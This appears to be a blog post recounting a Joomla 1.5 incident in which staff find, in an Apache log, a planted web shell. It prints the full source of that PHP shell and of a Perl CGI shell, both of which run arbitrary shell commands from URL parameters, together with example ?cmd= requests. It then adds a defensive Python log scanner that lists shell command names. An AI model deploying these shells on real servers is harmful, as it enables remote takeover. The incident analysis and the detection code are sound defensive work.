Joomla Bug Day at OSCC MAMPU
We spent the whole morning discussing the Joomla! 1.5.x (5 and below) bug. You can read Indhran's blog about how we reset the admin password.
Rescue Your Joomla 15x Sites
Related blog post
Then Abdullah, our Hightech Rojak blogger, found something in the Apache log.
This command:
http://oscc.lan/modules/mod_jsys/mod_jsys.php?cmd=ls
When we tried it in a web browser such as Mozilla Firefox, we could list all the files in the directory. I used that link to find the location of the mod_jsys.php file and used cat to view the file, simply from Mozilla Firefox.
http://oscc.lan/modules/mod_jsys/mod_jsys.php?cmd=cat%20/var/www/html/cioconf/modules/mod_jsys/mod_jsys.php
--------- mod_jsys.php content
Welcome Welcome
<?php
// Keeps the companion CGI shell executable.
chmod("../../modules/mod_jsys/mod_jsys.cgi", 0755);
// Runs the cmd request parameter as a shell command and echoes the output.
if(!empty($_REQUEST['cmd'])) {
    $buf = shell_exec($_REQUEST['cmd']);
    $buf = str_replace("\n", "<br>\n", $buf);
    echo $buf;
}
// With a patch parameter, rewrites Joomla's com_user reset model so that an empty token is rejected.
if(!empty($_REQUEST['patch'])) {
    $fd = fopen("../../components/com_user/models/reset.php", "r");
    $fd2 = fopen("../../tmp/p", "w");
    if(!$fd) {
        echo "Unable to patch";
        exit;
    }
    // Copies reset.php line by line; the token lookup line gets a check inserted in front of it.
    while($buf = fgets($fd)) {
        if(!strpos($buf, "block = 0 AND activation = '.\$db->Quote(")) {
            fwrite($fd2, $buf);
        }
        else {
            fwrite($fd2, 'if($db->Quote($token) == "\'\'") {
die("FUCK OFF RETARD");
}'."\n");
            fwrite($fd2, ' $db->setQuery(\'SELECT id FROM #__users WHERE block = 0 AND activation = \'.$db->Quote($token));');
        }
    }
    fclose($fd2);
    // Swaps the rewritten copy in place of the original reset.php.
    $res = rename("../../tmp/p", "../../components/com_user/models/reset.php");
    if($res) {
        echo "Patched";
    }
    else {
        echo "Patch failed, unable to copy file";
        system("rm -f ../../tmp/p");
    }
}
?>
---- mod_jsys.cgi content
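#!/usr/bin/perl
print "Content-type: text/html\r\n\r\n";
print "Welcome\n";
# Takes the field after the first '=' in the query string, whatever the parameter is called.
@cmd = split(/=/, $ENV{'QUERY_STRING'});
# Percent-decodes it, then runs it as a shell command in backticks.
$cmd[1] =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$cmd = `$cmd[1]`;
$cmd =~ s/\n/\n/g;
print $cmd;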
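
An added example, not part of the original post: a Python version of the Apache log check that surfaced the shell. It flags script requests whose decoded query value starts with a shell command, or whose parameter is one of the names mod_jsys.php reads (cmd, patch). The log lines, the SHELL_WORDS list and the function names are assumptions constructed for illustration; matching on the value matters because mod_jsys.cgi accepts any parameter name.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines; only the two ?cmd= URLs come from the post.
SAMPLE_LOG = '''\
192.0.2.10 - - [01/Jan/2000:09:14:02 +0800] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.0.2.77 - - [01/Jan/2000:09:15:40 +0800] "GET /modules/mod_jsys/mod_jsys.php?cmd=ls HTTP/1.1" 200 412 "-" "Mozilla/5.0"
192.0.2.77 - - [01/Jan/2000:09:16:05 +0800] "GET /modules/mod_jsys/mod_jsys.php?cmd=cat%20/var/www/html/cioconf/modules/mod_jsys/mod_jsys.php HTTP/1.1" 200 1893 "-" "Mozilla/5.0"
192.0.2.77 - - [01/Jan/2000:09:17:31 +0800] "GET /modules/mod_jsys/mod_jsys.cgi?x=uname%20-a HTTP/1.1" 200 97 "-" "Mozilla/5.0"
192.0.2.77 - - [01/Jan/2000:09:18:12 +0800] "GET /modules/mod_jsys/mod_jsys.php?patch=1 HTTP/1.1" 200 15 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Jan/2000:09:19:00 +0800] "GET /images/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
'''

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" \d{3} ')
SCRIPT_RE = re.compile(r"\.(php|cgi|pl)$", re.IGNORECASE)
SUSPECT_PARAMS = {"cmd", "patch"}  # the parameters mod_jsys.php reads
# Assumption: a starter list of commands; extend it for your environment.
SHELL_WORDS = {"ls", "cat", "id", "uname", "pwd", "whoami", "wget", "curl"}

def classify(name, value):
    """Return a reason if one decoded query parameter looks like shell use, else None."""
    words = value.split()
    if words and words[0].rsplit("/", 1)[-1] in SHELL_WORDS:
        return "value starts with a shell command"
    if name.lower() in SUSPECT_PARAMS:
        return "parameter name read by mod_jsys.php"

def suspicious_requests(log_text):
    """Return (client_ip, path, parameter, decoded_value, reason) per flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        if not SCRIPT_RE.search(url.path):
            continue  # only requests to server-side scripts are of interest
        # parse_qsl percent-decodes, so cmd=cat%20/var/... becomes "cat /var/..."
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            reason = classify(name, value)
            if reason:
                hits.append((ip, url.path, name, value, reason))
                break
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

$_REQUEST also reads POST data and cookies, which the access log does not record, so an empty result does not show that the script went unused.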